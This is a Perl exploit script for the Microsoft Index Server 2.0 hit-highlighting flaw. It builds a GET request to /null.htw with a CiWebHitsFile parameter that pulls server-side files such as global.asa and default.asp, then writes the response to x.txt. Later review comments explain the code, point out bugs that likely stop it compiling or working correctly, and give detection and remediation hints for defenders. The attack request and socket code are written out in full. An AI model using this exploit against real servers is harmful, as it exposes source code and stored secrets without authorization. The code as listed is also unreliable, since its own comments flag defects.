#!/usr/bin/perl
#
###########################################################################################
# exploit for the Microsoft Index Server 2.0 hit-highlighting flaw, which allows you
# to view any file in the wwwroot directory and down.
#
#  usage: perl sourceview.pl www.server.com (files in wwwroot and down)
#                                             /global.asa /default.asp etc...
#
# Banner text that connect() prints to the operator's terminal before dumping
# the response. It is never placed in the HTTP request.
$sploitname="\t\t\t\<ms \%20 vuln file snatcher exploit by \\x00\\x00\>\n";
#
###########################################################################################
#
#############################
# Top-level setup: read the target host and the requested path from the command
# line, then call connect() once. The script has no `use strict` or
# `use warnings`, and neither argument is validated or checked for presence.
#
# NOTE(review): the bare `[2000]` tokens on the `use IO::Socket;` line and the
# `$size=0;` line sit outside the comments. Perl would parse each as an
# expression running into the next statement, so the file as listed most likely
# does not compile. They look like a stray archive stamp rather than part of
# the script -- confirm against another copy before drawing conclusions from it.
use IO::Socket;       [2000]# special shoutouts to govboi
my ($port, $sock,$server);  # from x00x00
$size=0;              [2000]# ooo2 release
#############################
#
# $server: first argument, the host to contact. $s and $F are assigned here but
# never read in the visible code; $sock is declared but never used (the sub
# uses the bareword handle SOCK instead).
$server="$ARGV[0]";
$s="$server";
$F="";
# Fixed to plain HTTP on port 80; there is no option to change it.
$port="80";
# $cm: second argument, copied unmodified into the CiWebHitsFile query
# parameter by connect(). No encoding or sanity check is applied.
$cm="$ARGV[1]";
# Calls the user-defined sub below. The `connect(SOCK, $paddr)` call inside
# that sub still resolves to Perl's builtin connect, not to the sub itself.
&connect;

# connect: send one HTTP/1.0 GET for /null.htw to $server:$port and write the
# response to x.txt in the current directory.
#
# Reads the globals $server, $port, $cm and $sploitname; takes no arguments and
# never returns (it ends in exit).
#
# What this looks like to a defender, taken from the request string below:
#   - the path ends in .htw (/null.htw);
#   - the query carries CiWebHitsFile=<path> with a trailing `+` appended to the
#     path (the banner refers to this as the "%20" issue), followed by
#     CiRestriction=none and CiHiliteType=Full;
#   - the request is HTTP/1.0, has no headers at all, and ends in bare "\n\n"
#     instead of CRLF pairs.
# NOTE(review): web-server logs showing .htw requests whose CiWebHitsFile value
# names script or config files (the header comment cites /global.asa and
# /default.asp) are worth alerting on. The usual remediation is the vendor fix
# for Index Server hit-highlighting plus removing the .htw script mapping where
# hit-highlighting is not needed -- confirm against the vendor advisory.
sub connect {
  # Request line built by direct interpolation of $cm; nothing is URL-encoded.
  $ver="GET /null.htw?CiWebHitsFile=$cm+&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
  my($iaddr,$paddr,$proto);
  # Resolve the host and build the packed address; each step dies with $! on
  # failure.
  $iaddr = inet_aton($server) || die "Error: $!";
  $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  $proto = getprotobyname('tcp') || die "Error: $!";
  # Bareword handle SOCK; these are the builtin socket/connect/send calls.
  socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
  connect(SOCK, $paddr) || die "Error: $!";
  send(SOCK, $ver, 0) || die "Can't to send packet: $!";
  # NOTE(review): two-argument open on a fixed file name, return value not
  # checked. An existing x.txt is truncated, and if the open fails the prints
  # to OUT below fail silently.
  open(OUT, ">x.txt");
  print $sploitname;
  print "\t\<\!\> \<\!\> \<\!\> dumping $cm to x.txt \n";
  # NOTE(review): the loop condition reads one line into $_, which is never
  # written out; the body then reads the rest of the stream in list context.
  # The first line of the response therefore does not reach x.txt.
  while(<SOCK>) {
    print OUT <SOCK>;
  }
  close OUT;
  # $n and $type are assigned but never read in the visible code.
  $n=0;
  $type=2;

  close(SOCK);
  # Exits with status 1 even when everything above succeeded, so callers
  # cannot tell success from failure by exit code.
  exit(1);
}